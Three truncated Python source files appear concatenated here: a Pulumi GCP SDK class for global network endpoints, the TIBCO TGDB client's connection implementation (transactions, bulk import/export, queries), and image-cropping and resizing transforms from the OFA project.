This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
"""
return pulumi.get(self, "fqdn")
@fqdn.setter
def fqdn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fqdn", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
IPv4 address external endpoint.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _GlobalNetworkEndpointState:
def __init__(__self__, *,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering GlobalNetworkEndpoint resources.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
:param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
:param pulumi.Input[str] ip_address: IPv4 address external endpoint.
:param pulumi.Input[int] port: Port number of the external endpoint.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
if fqdn is not None:
pulumi.set(__self__, "fqdn", fqdn)
if global_network_endpoint_group is not None:
pulumi.set(__self__, "global_network_endpoint_group", global_network_endpoint_group)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if port is not None:
pulumi.set(__self__, "port", port)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter
def fqdn(self) -> Optional[pulumi.Input[str]]:
"""
Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
"""
return pulumi.get(self, "fqdn")
@fqdn.setter
def fqdn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "fqdn", value)
@property
@pulumi.getter(name="globalNetworkEndpointGroup")
def global_network_endpoint_group(self) -> Optional[pulumi.Input[str]]:
"""
The global network endpoint group this endpoint is part of.
"""
return pulumi.get(self, "global_network_endpoint_group")
@global_network_endpoint_group.setter
def global_network_endpoint_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "global_network_endpoint_group", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
IPv4 address external endpoint.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
Port number of the external endpoint.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
class GlobalNetworkEndpoint(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A Global Network endpoint represents a IP address and port combination that exists outside of GCP.
**NOTE**: Global network endpoints cannot be created outside of a
global network endpoint group.
To get more information about GlobalNetworkEndpoint, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/rest/beta/networkEndpointGroups)
* How-to Guides
* [Official Documentation](https://cloud.google.com/load-balancing/docs/negs/)
## Example Usage
### Global Network Endpoint
```python
import pulumi
import pulumi_gcp as gcp
neg = gcp.compute.GlobalNetworkEndpointGroup("neg",
default_port=90,
network_endpoint_type="INTERNET_FQDN_PORT")
default_endpoint = gcp.compute.GlobalNetworkEndpoint("default-endpoint",
global_network_endpoint_group=neg.name,
fqdn="www.example.com",
port=90)
```
## Import
GlobalNetworkEndpoint can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default projects/{{project}}/global/networkEndpointGroups/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{project}}/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
:param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
:param pulumi.Input[str] ip_address: IPv4 address external endpoint.
:param pulumi.Input[int] port: Port number of the external endpoint.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: GlobalNetworkEndpointArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A Global Network endpoint represents a IP address and port combination that exists outside of GCP.
**NOTE**: Global network endpoints cannot be created outside of a
global network endpoint group.
To get more information about GlobalNetworkEndpoint, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/rest/beta/networkEndpointGroups)
* How-to Guides
* [Official Documentation](https://cloud.google.com/load-balancing/docs/negs/)
## Example Usage
### Global Network Endpoint
```python
import pulumi
import pulumi_gcp as gcp
neg = gcp.compute.GlobalNetworkEndpointGroup("neg",
default_port=90,
network_endpoint_type="INTERNET_FQDN_PORT")
default_endpoint = gcp.compute.GlobalNetworkEndpoint("default-endpoint",
global_network_endpoint_group=neg.name,
fqdn="www.example.com",
port=90)
```
## Import
GlobalNetworkEndpoint can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default projects/{{project}}/global/networkEndpointGroups/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{project}}/{{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
```sh
$ pulumi import gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint default {{global_network_endpoint_group}}/{{ip_address}}/{{fqdn}}/{{port}}
```
:param str resource_name: The name of the resource.
:param GlobalNetworkEndpointArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(GlobalNetworkEndpointArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = GlobalNetworkEndpointArgs.__new__(GlobalNetworkEndpointArgs)
__props__.__dict__["fqdn"] = fqdn
if global_network_endpoint_group is None and not opts.urn:
raise TypeError("Missing required property 'global_network_endpoint_group'")
__props__.__dict__["global_network_endpoint_group"] = global_network_endpoint_group
__props__.__dict__["ip_address"] = ip_address
if port is None and not opts.urn:
raise TypeError("Missing required property 'port'")
__props__.__dict__["port"] = port
__props__.__dict__["project"] = project
super(GlobalNetworkEndpoint, __self__).__init__(
'gcp:compute/globalNetworkEndpoint:GlobalNetworkEndpoint',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
fqdn: Optional[pulumi.Input[str]] = None,
global_network_endpoint_group: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None) -> 'GlobalNetworkEndpoint':
"""
Get an existing GlobalNetworkEndpoint resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG | |
<reponame>TIBCOSoftware/tgdb-client<filename>api/python/src/tgdb/impl/connectionimpl.py
"""
* Copyright 2019 TIBCO Software Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"); You may not use this file except
* in compliance with the License.
* A copy of the License is included in the distribution package with this file.
* You also may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* File name :connectionimpl.py
* Created on: 5/15/2019
* Created by: suresh
*
* SVN Id: $Id: connectionimpl.py 3256 2019-06-10 03:31:30Z ssubrama $
*
* This file encapsulates connection interfaces
"""
from tgdb.log import *
import tgdb.log as tglog
from tgdb.utils import *
from tgdb.impl.atomics import *
import typing
import tgdb.channel as tgchannel
import tgdb.impl.channelimpl as tgchannelimpl
import tgdb.pdu as tgpdu
import tgdb.impl.pduimpl as tgpduimpl
import tgdb.connection as tgconn
import tgdb.model as tgmodel
import tgdb.impl.entityimpl as tgentimpl
import tgdb.impl.gmdimpl as tggmdimpl
import tgdb.query as tgquery
import tgdb.impl.queryimpl as tgqueryimpl
import tgdb.exception as tgexception
import tgdb.bulkio as tgbulk
import tgdb.admin as tgadm
def findCommandForLang(lang: str) -> tgquery.TGQueryCommand:
retCommand: tgquery.TGQueryCommand
if lang == "tgql":
retCommand = tgquery.TGQueryCommand.Execute
elif lang == "gremlin":
retCommand = tgquery.TGQueryCommand.ExecuteGremlinStr
elif lang == "gbc":
retCommand = tgquery.TGQueryCommand.ExecuteGremlin
else:
raise tgexception.TGException("Unknown property for ConnectionDefaultQueryLanguage: %s", lang)
return retCommand
def findCommandAndQueryString(query: str, props: tgchannel.TGProperties) -> typing.Tuple[tgquery.TGQueryCommand, str]:
lang: str = props.get(ConfigName.ConnectionDefaultQueryLanguage,
ConfigName.ConnectionDefaultQueryLanguage.defaultvalue)
retCommand: tgquery.TGQueryCommand
retStr = query
try:
idx: int = query.index("://")
prefix = query[:idx].lower()
retCommand = findCommandForLang(prefix)
retStr = query[idx + 3:]
except ValueError:
lang = lang.lower()
retCommand = findCommandForLang(lang)
return retCommand, retStr
class ConnectionImpl(tgconn.TGConnection):
def __init__(self, url, username, password, dbName: typing.Optional[str], env):
self.__url__ = url
self.__username__ = username
self.__password__ = password
self.__props__: TGProperties = TGProperties(env)
self._dbName = dbName
self.__channel__: tgchannel.TGChannel = tgchannel.TGChannel.createChannel(url, username, password, dbName,
self.__props__)
self.__props__.update(tgchannelimpl.LinkUrl.parse(url).properties)
self.__gof__: tggmdimpl.GraphObjectFactoryImpl = tggmdimpl.GraphObjectFactoryImpl(self)
self.__addEntities__: typing.Dict[int, tgentimpl.AbstractEntity] = {}
self.__updateEntities__: typing.Dict[int, tgentimpl.AbstractEntity] = {}
self.__removeEntities__: typing.Dict[int, tgentimpl.AbstractEntity] = {}
self.__requestIds__ = AtomicReference('i', 0)
def _genBCRWaiter(self) -> tgchannelimpl.BlockingChannelResponseWaiter:
timeout = self.__props__.get(ConfigName.ConnectionOperationTimeoutSeconds, None)
if timeout is not None and isinstance(timeout, str):
timeout = float(timeout)
requestId = self.__requestIds__.increment()
return tgchannelimpl.BlockingChannelResponseWaiter(requestId, timeout)
def connect(self):
tglog.gLogger.log(tglog.TGLevel.Debug, "Attempting to connect")
self.__channel__.connect()
tglog.gLogger.log(tglog.TGLevel.Debug, "Connected, now logging in.")
self.__channel__.start()
tglog.gLogger.log(tglog.TGLevel.Debug, "Logged in, now acquiring metadata.")
self.__initMetadata__()
tglog.gLogger.log(tglog.TGLevel.Debug, "Acquired metadata, now sending connection properties.")
self.__sendConnectionProperties()
tglog.gLogger.log(tglog.TGLevel.Debug, 'Connected successfully')
def __initMetadata__(self):
waiter = self._genBCRWaiter()
request = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.MetadataRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
response = self.__channel__.send(request, waiter)
if response.verbid != tgpdu.VerbId.MetadataResponse:
raise tgexception.TGException('Invalid response object received')
self.__gof__.graphmetadata.registry = response.typeregistry
def disconnect(self):
self.__channel__.disconnect()
self.__channel__.stop()
def commit(self):
channelResponse = self._genBCRWaiter()
try:
if gLogger.level is TGLevel.Debug:
def echoAttributes(ent: tgmodel.TGEntity):
gLogger.log(TGLevel, "Entity ID: %d", ent.virtualId)
attr: tgmodel.TGAttribute
for attr in ent.attributes:
gLogger.log(TGLevel, " Attribute: %s", attr._value)
[echoAttributes(ent) for ent in self.__addEntities__.values()]
[echoAttributes(ent) for ent in self.__updateEntities__.values()]
[echoAttributes(ent) for ent in self.__removeEntities__.values()]
request: tgpduimpl.CommitTransactionRequestMessage = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.CommitTransactionRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
attrDescSet = self.graphObjectFactory.graphmetadata.attritubeDescriptors
request.addCommitList(self.__addEntities__, self.__updateEntities__, self.__removeEntities__, attrDescSet)
response: tgpduimpl.CommitTransactionResponseMessage = self.__channel__.send(request, channelResponse)
if response.exception is not None:
raise response.exception
response.finishReadWith(self.__addEntities__, self.__updateEntities__, self.__removeEntities__,
self.__gof__.graphmetadata.registry)
for id in self.__removeEntities__:
self.__removeEntities__[id].markDeleted()
if gLogger.isEnabled(TGLevel.Debug):
gLogger.log(TGLevel.Debug, "Transaction commit succeeded")
except IOError as e:
raise tgexception.TGException.buildException("IO Error", cause=e)
finally:
for id in self.__addEntities__:
self.__addEntities__[id].resetModifiedAttributes()
for id in self.__updateEntities__:
self.__updateEntities__[id].resetModifiedAttributes()
self.__addEntities__.clear()
self.__updateEntities__.clear()
self.__removeEntities__.clear()
def refreshMetadata(self):
self.__initMetadata__()
def rollback(self):
self.__addEntities__.clear()
self.__updateEntities__.clear()
self.__removeEntities__.clear()
def __sendConnectionProperties(self):
request: tgpduimpl.ConnectionPropertiesMessage = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.ConnectionPropertiesMessage, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.props = self.__channel__.properties
self.__channel__.send(request)
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Begin Bulk Import Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
def startImport(self, loadopt: typing.Union[str, tgbulk.TGLoadOptions] = tgbulk.TGLoadOptions.Insert,
erroropt: typing.Union[str, tgbulk.TGErrorOptions] = tgbulk.TGErrorOptions.Stop,
dateformat: typing.Union[str, tgbulk.TGDateFormat] = tgbulk.TGDateFormat.YMD,
props: typing.Optional[TGProperties] = None):
import tgdb.impl.bulkioimpl as tgbulkimpl
ret: tgbulkimpl.BulkImportImpl
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.BeginImportSessionRequest
request = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.BeginImportRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
if isinstance(loadopt, str):
loadopt = tgbulk.TGErrorOptions.findVal(loadopt)
if loadopt == tgbulk.TGLoadOptions.Invalid:
raise tgexception.TGException("Bad argument: cannot have an invalid load option!")
if isinstance(erroropt, str):
erroropt = tgbulk.TGErrorOptions.findVal(erroropt)
if erroropt == tgbulk.TGErrorOptions.Invalid:
raise tgexception.TGException("Bad argument: cannot have an invalid error option!")
if isinstance(dateformat, str):
dateformat = tgbulk.TGDateFormat.findVal(dateformat)
if dateformat == tgbulk.TGDateFormat.Invalid:
raise tgexception.TGException("Bad argument: cannot have an invalid Date-Time Format!")
request.loadopt = loadopt
request.erroropt = erroropt
request.dtformat = dateformat
response: tgpduimpl.BeginImportSessionResponse = self.__channel__.send(request, channelResponseWaiter)
if response.error is not None:
raise response.error
ret = tgbulkimpl.BulkImportImpl(self, props)
return ret
def partialImportEntity(self, entType: tgmodel.TGEntityType, reqIdx: int, totReqs: int, data: str,
attrList: typing.List[str]) -> typing.List[tgadm.TGImportDescriptor]:
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.PartialImportRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.PartialImportRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
request.type = entType
request.reqIdx = reqIdx
request.totalRequestsForType = totReqs
request.data = data
request.attrList = attrList
response: tgpduimpl.PartialImportResponse = self.__channel__.send(request, channelResponseWaiter)
if response.error is not None:
raise response.error
return response.resultList
def endBulkImport(self):
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.EndBulkImportSessionRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.EndImportRequest,
authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
response: tgpduimpl.PartialImportResponse = self.__channel__.send(request, channelResponseWaiter)
return response.resultList
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// End Bulk Import Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Begin Bulk Export Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
def startExport(self, props: typing.Optional[TGProperties] = None, zip: typing.Optional[str] = None,
isBatch: bool = True):
import tgdb.impl.bulkioimpl as tgbulkimpl
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.BeginExportRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.BeginExportRequest, authtoken=self.__channel__.authtoken, sessionid=self.__channel__.sessionid)
request.zipName = zip
request.isBatch = isBatch
request.maxBatchEntities = int(ConfigName.BulkIOEntityBatchSize.defaultvalue)\
if props is None or props[ConfigName.BulkIOEntityBatchSize] is None else\
int(props[ConfigName.BulkIOEntityBatchSize])
response: tgpduimpl.BeginExportResponse = self.__channel__.send(request, channelResponseWaiter)
if response.error is not None:
raise response.error
return tgbulkimpl.BulkExportImpl(self, props, response.typeList, response.numRequests)
def partialExport(self, reqNum: int) -> typing.Tuple[str, bytes, bool, int,
typing.Optional[typing.Tuple[str, typing.List[str]]]]:
channelResponseWaiter = self._genBCRWaiter()
request: tgpduimpl.PartialExportRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.PartialExportRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.requestNum = reqNum
response: tgpduimpl.PartialExportResponse = self.__channel__.send(request, channelResponseWaiter)
return response.fileName, response.data, response.hasMore, response.numEntities,\
(response.typeName, response.attrList) if response.newType else None
"""
def startExport(self, props: Optional[TGProperties] = None) -> tgbulk.TGBulkExport:
channelResponseWaiter = self.__genBCRWaiter()
request = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.BeginBulkExportSessionRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
_ = self.__channel__.send(request, channelResponseWaiter)
return tgbulkimpl.BulkExportImpl(self, props)
def beginBatchExportEntity(self, entkind: tgmodel.TGEntityKind, enttype: tgmodel.TGEntityType, batchSize: int) \
-> Tuple[int, List[str]]:
channelResponseWaiter = self.__genBCRWaiter()
request: tgpduimpl.BeginBatchExportEntityRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.BeginBatchExportEntityRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.entKind = entkind
request.entType = enttype
request.batchSize = batchSize
response: tgpduimpl.BeginBatchExportEntityResponse = self.__channel__.send(request, channelResponseWaiter)
return response.descriptor, response.columnLabels
def singleBatchExportEntity(self, desc: int) -> Tuple[int, str, bool]:
channelResponseWaiter = self.__genBCRWaiter()
request: tgpduimpl.SingleBatchExportEntityRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.SingleBatchExportEntityRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.descriptor = desc
response: tgpduimpl.SingleBatchExportEntityResponse = self.__channel__.send(request, channelResponseWaiter)
return response.numEnts, response.data, response.hasMore
def endBulkExportSession(self):
channelResponseWaiter = self.__genBCRWaiter()
request: tgpduimpl.EndBulkExportSessionRequest = tgpduimpl.TGMessageFactory.createMessage(
tgpdu.VerbId.EndBulkExportSessionRequest, authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
_ = self.__channel__.send(request, channelResponseWaiter)
"""
"""
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// End Bulk Export Stuff //
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
"""
def getEntity(self, key: tgmodel.TGKey, option: tgquery.TGQueryOption = tgquery.DefaultQueryOption) ->\
tgmodel.TGEntity:
channelResponseWaiter = self._genBCRWaiter()
requestMessage: tgpduimpl.GetEntityRequestMessage
retV: tgmodel.TGEntity = None
try:
requestMessage = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.GetEntityRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
requestMessage.command = tgpduimpl.GetEntityCommand.GetEntity
requestMessage.key = key
response: tgpduimpl.GetEntityResponseMessage = self.__channel__.send(requestMessage, channelResponseWaiter)
if response.hasResult:
response.finishReadWith(self.graphObjectFactory)
fetchedEntities = response.fetchedEntities
for id in fetchedEntities:
fetchedEnt: tgmodel.TGEntity = fetchedEntities[id]
if key.matches(fetchedEnt):
retV = fetchedEnt
break
finally:
pass
return retV
def insertEntity(self, entity: tgmodel.TGEntity):
if not entity.isNew:
raise tgexception.TGException("Should only be calling insertEntity on a new entity!")
if entity.virtualId not in self.__removeEntities__:
self.__addEntities__[entity.virtualId] = entity
self.__updateEdge__(entity)
if gLogger.isEnabled(TGLevel.Debug):
gLogger.log(TGLevel.Debug, 'Insert entity called')
def updateEntity(self, entity: tgmodel.TGEntity):
if entity.isNew:
raise tgexception.TGException('Should not be calling update on a new entity!')
if entity.isDeleted:
raise tgexception.TGException('Should not be calling update on an already deleted entity!')
if entity.virtualId not in self.__removeEntities__:
self.__updateEntities__[entity.virtualId] = entity
self.__updateEdge__(entity)
def __updateEdge__(self, entity: tgmodel.TGEntity):
if isinstance(entity, tgentimpl.EdgeImpl):
edge: tgmodel.TGEdge = entity
fr, to = edge.vertices
if not fr.isNew and fr.virtualId not in self.__removeEntities__:
self.__updateEntities__[fr.virtualId] = fr
if not to.isNew and to.virtualId not in self.__removeEntities__:
self.__updateEntities__[to.virtualId] = to
def deleteEntity(self, entity: tgentimpl.AbstractEntity):
if entity.isDeleted:
raise tgexception.TGException('Should not be calling delete on an already deleted entity!')
# Remove any entities added to the add changelist
if entity.virtualId in self.__addEntities__:
del self.__addEntities__[entity.virtualId]
# Remove any entities added to the update changelist
if entity.virtualId in self.__updateEntities__:
del self.__updateEntities__[entity.virtualId]
if entity.isNew:
entity.markDeleted()
else:
self.__removeEntities__[entity.virtualId] = entity
self.__updateEdge__(entity)
def createQuery(self, query: str) -> tgquery.TGQuery:
channelResponseWaiter: tgchannel.TGChannelResponseWaiter
result: int
ret: tgquery.TGQuery = None
channelResponseWaiter = self._genBCRWaiter()
try:
request: tgpduimpl.QueryRequestMessage = tgpduimpl.TGMessageFactory.createMessage(tgpdu.VerbId.QueryRequest,
authtoken=self.__channel__.authtoken,
sessionid=self.__channel__.sessionid)
request.command = tgquery.TGQueryCommand.Create
request.query = query
response: tgpduimpl.QueryResponseMessage = self.__channel__.send(request, channelResponseWaiter)
gLogger.log(TGLevel.Debug, "Send query completed")
result: int = response.result
queryHashId: int = response.queryHashId
if result == 0 and queryHashId > 0: #TODO Create error reporting for query result.
ret = tgqueryimpl.QueryImpl(self, queryHashId)
finally:
pass
return ret
def executeQuery(self, query: typing.Optional[str] | |
<reponame>zhaoguangxiang/OFA
import random
import torch
import torchvision.transforms as T
import torchvision.transforms.functional as F
import numpy as np
from PIL import Image
def crop(image, target, region, delete=True):
cropped_image = F.crop(image, *region)
target = target.copy()
i, j, h, w = region
# should we do something wrt the original size?
target["size"] = torch.tensor([h, w])
fields = ["labels", "area"]
if "boxes" in target:
boxes = target["boxes"]
max_size = torch.as_tensor([w, h], dtype=torch.float32)
cropped_boxes = boxes - torch.as_tensor([j, i, j, i])
cropped_boxes = torch.min(cropped_boxes.reshape(-1, 2, 2), max_size)
cropped_boxes = cropped_boxes.clamp(min=0)
area = (cropped_boxes[:, 1, :] - cropped_boxes[:, 0, :]).prod(dim=1)
target["boxes"] = cropped_boxes.reshape(-1, 4)
target["area"] = area
fields.append("boxes")
if "polygons" in target:
polygons = target["polygons"]
num_polygons = polygons.shape[0]
max_size = torch.as_tensor([w, h], dtype=torch.float32)
start_coord = torch.cat([torch.tensor([j, i], dtype=torch.float32)
for _ in range(polygons.shape[1] // 2)], dim=0)
cropped_boxes = polygons - start_coord
cropped_boxes = torch.min(cropped_boxes.reshape(num_polygons, -1, 2), max_size)
cropped_boxes = cropped_boxes.clamp(min=0)
target["polygons"] = cropped_boxes.reshape(num_polygons, -1)
fields.append("polygons")
if "masks" in target:
# FIXME should we update the area here if there are no boxes?
target['masks'] = target['masks'][:, i:i + h, j:j + w]
fields.append("masks")
# remove elements for which the boxes or masks that have zero area
if delete and ("boxes" in target or "masks" in target):
# favor boxes selection when defining which elements to keep
# this is compatible with previous implementation
if "boxes" in target:
cropped_boxes = target['boxes'].reshape(-1, 2, 2)
keep = torch.all(cropped_boxes[:, 1, :] > cropped_boxes[:, 0, :], dim=1)
else:
keep = target['masks'].flatten(1).any(1)
for field in fields:
target[field] = target[field][keep.tolist()]
return cropped_image, target
def hflip(image, target):
flipped_image = F.hflip(image)
w, h = image.size
target = target.copy()
if "boxes" in target:
boxes = target["boxes"]
boxes = boxes[:, [2, 1, 0, 3]] * torch.as_tensor([-1, 1, -1, 1]) + torch.as_tensor([w, 0, w, 0])
target["boxes"] = boxes
if "polygons" in target:
polygons = target["polygons"]
num_polygons = polygons.shape[0]
polygons = polygons.reshape(num_polygons, -1, 2) * torch.as_tensor([-1, 1]) + torch.as_tensor([w, 0])
target["polygons"] = polygons
if "masks" in target:
target['masks'] = target['masks'].flip(-1)
return flipped_image, target
def resize(image, target, size, max_size=None):
# size can be min_size (scalar) or (w, h) tuple
def get_size_with_aspect_ratio(image_size, size, max_size=None):
w, h = image_size
if (w <= h and w == size) or (h <= w and h == size):
if max_size is not None:
max_size = int(max_size)
h = min(h, max_size)
w = min(w, max_size)
return (h, w)
if w < h:
ow = size
oh = int(size * h / w)
else:
oh = size
ow = int(size * w / h)
if max_size is not None:
max_size = int(max_size)
oh = min(oh, max_size)
ow = min(ow, max_size)
return (oh, ow)
def get_size(image_size, size, max_size=None):
if isinstance(size, (list, tuple)):
return size[::-1]
else:
return get_size_with_aspect_ratio(image_size, size, max_size)
size = get_size(image.size, size, max_size)
rescaled_image = F.resize(image, size, interpolation=Image.BICUBIC)
if target is None:
return rescaled_image
ratios = tuple(float(s) / float(s_orig) for s, s_orig in zip(rescaled_image.size, image.size))
ratio_width, ratio_height = ratios
target = target.copy()
if "boxes" in target:
boxes = target["boxes"]
scaled_boxes = boxes * torch.as_tensor([ratio_width, ratio_height, ratio_width, ratio_height])
target["boxes"] = scaled_boxes
if "polygons" in target:
polygons = target["polygons"]
scaled_ratio = torch.cat([torch.tensor([ratio_width, ratio_height])
for _ in range(polygons.shape[1] // 2)], dim=0)
scaled_polygons = polygons * scaled_ratio
target["polygons"] = scaled_polygons
if "area" in target:
area = target["area"]
scaled_area = area * (ratio_width * ratio_height)
target["area"] = scaled_area
h, w = size
target["size"] = torch.tensor([h, w])
if "masks" in target:
assert False
# target['masks'] = interpolate(
# target['masks'][:, None].float(), size, mode="nearest")[:, 0] > 0.5
return rescaled_image, target
class CenterCrop(object):
def __init__(self, size):
self.size = size
def __call__(self, img, target):
image_width, image_height = img.size
crop_height, crop_width = self.size
crop_top = int(round((image_height - crop_height) / 2.))
crop_left = int(round((image_width - crop_width) / 2.))
return crop(img, target, (crop_top, crop_left, crop_height, crop_width))
class ObjectCenterCrop(object):
def __init__(self, size):
self.size = size
def __call__(self, img, target):
image_width, image_height = img.size
crop_height, crop_width = self.size
